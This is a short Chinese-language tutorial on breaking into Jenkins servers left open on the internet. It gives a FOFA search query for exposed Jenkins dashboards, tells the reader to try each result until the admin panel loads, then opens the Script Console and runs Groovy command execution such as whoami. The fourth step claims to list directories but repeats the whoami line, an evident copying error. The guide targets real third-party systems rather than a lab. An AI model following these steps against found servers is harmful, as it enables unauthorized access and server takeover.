默認(rèn)情況下 Jenkins面板中用戶(hù)可以選擇執(zhí)行腳本界面來(lái)操作一些系統(tǒng)層命令，攻擊者可通過(guò)未授權(quán)訪(fǎng)問(wèn)漏洞或者暴力破解用戶(hù)密碼等進(jìn)入后臺(tái)管理服務(wù)，通過(guò)腳本執(zhí)行界面從而獲取服務(wù)器權(quán)限。

第一步：使用fofa語(yǔ)句搜索

搜索語(yǔ)句：

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

一個(gè)一個(gè)搜索，直到出現(xiàn) Manage Jenkins，在打開(kāi)的URL中...點(diǎn)擊 Manage Jenkins
Scritp Console 再執(zhí)行以下命令.

第二步：點(diǎn)進(jìn)去后，頁(yè)面往下翻看到Scritp Console——點(diǎn)擊。

、

第三步：執(zhí)行命令，查看當(dāng)前用戶(hù)名

println "whoami".execute().text

如下圖就是執(zhí)行中

第四步：執(zhí)行命令，查看目錄

println "whoami".execute().text